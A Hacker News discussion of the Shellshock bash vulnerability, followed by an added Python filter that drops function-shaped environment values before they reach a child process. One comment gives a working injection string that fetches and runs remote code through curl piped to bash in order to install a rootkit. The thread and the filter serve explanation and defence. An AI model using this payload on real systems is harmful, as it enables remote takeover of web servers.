

Bash bug as big as Heartbleed - dpeck
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html

======
CGamesPlay
It's serious. It's a remote code execution vulnerability under whatever user
was running bash, and can be exploited by controlling an environment variable.
For example, if I enter

    () { _;}; curl http://rootk.it | bash

as my username on your website, and your website runs a script and sets
TARGET_USER to my username, then I will install my rootkit on your web server.

See:
[https://access.redhat.com/articles/1200223](https://access.redhat.com/articles/1200223)

~~~
pan69
I'm no security expert by any means and I'm probably not aware of the severity
of this issue, but:

> If I enter [script] as my username on your website, and your website runs a
> script and sets TARGET_USER to my username, then I will install my rootkit on
> your web server.

How contrived is this? I mean, who does this in the first place? Isn't this
more an issue with weird authentication?

Again, I'm probably ignorant of how all of this works, so if anyone could give a
better explanation...

~~~
CGamesPlay
A potentially more likely scenario might be: "If I upload [script].jpg to your
image service and you run a resizer that takes IMAGE_FILE as an environment
variable as input, then I will install my rootkit".
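
An added example, not part of the original thread: a defence-in-depth filter for the two scenarios above, where a web application copies user input into a child process's environment (TARGET_USER, IMAGE_FILE). It drops any value that begins with `() {`, the prefix unpatched bash treated as a function definition to import. The helper names and sample values are constructed for illustration, and the probe child is Python rather than bash.

```python
import subprocess
import sys

# Unpatched bash imported a function from ANY environment variable whose
# value began with these four characters, whatever the variable was called.
FUNC_IMPORT_PREFIX = "() {"


def is_function_shaped(value: str) -> bool:
    """True if the value starts the way an exported bash function does.

    Leading whitespace is stripped first; that is stricter than bash itself
    and is a conservative choice made for this example.
    """
    return value.lstrip().startswith(FUNC_IMPORT_PREFIX)


def scrub_env(env: dict) -> tuple:
    """Return (copy of env without function-shaped values, dropped names)."""
    dropped = sorted(k for k, v in env.items() if is_function_shaped(v))
    safe = {k: v for k, v in env.items() if k not in dropped}
    return safe, dropped


def child_sees(env: dict) -> list:
    """Spawn a child with the scrubbed env and return the names it received."""
    safe, _ = scrub_env(env)
    probe = "import os; print('\\n'.join(sorted(os.environ)))"
    done = subprocess.run([sys.executable, "-c", probe], env=safe,
                          capture_output=True, text=True, check=True)
    return done.stdout.split()


if __name__ == "__main__":
    # Constructed request data: one hostile username, one ordinary filename.
    request_env = {
        "TARGET_USER": "() { _;}; echo constructed-marker",
        "IMAGE_FILE": "holiday.jpg",
    }
    safe, dropped = scrub_env(request_env)
    print("dropped:", dropped)
    print("child received:", child_sees(request_env))
```

Filtering like this only narrows the exposure; the fix for the bug itself is a patched bash, and passing untrusted input as an argument instead of an environment variable keeps it out of bash's import path entirely.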

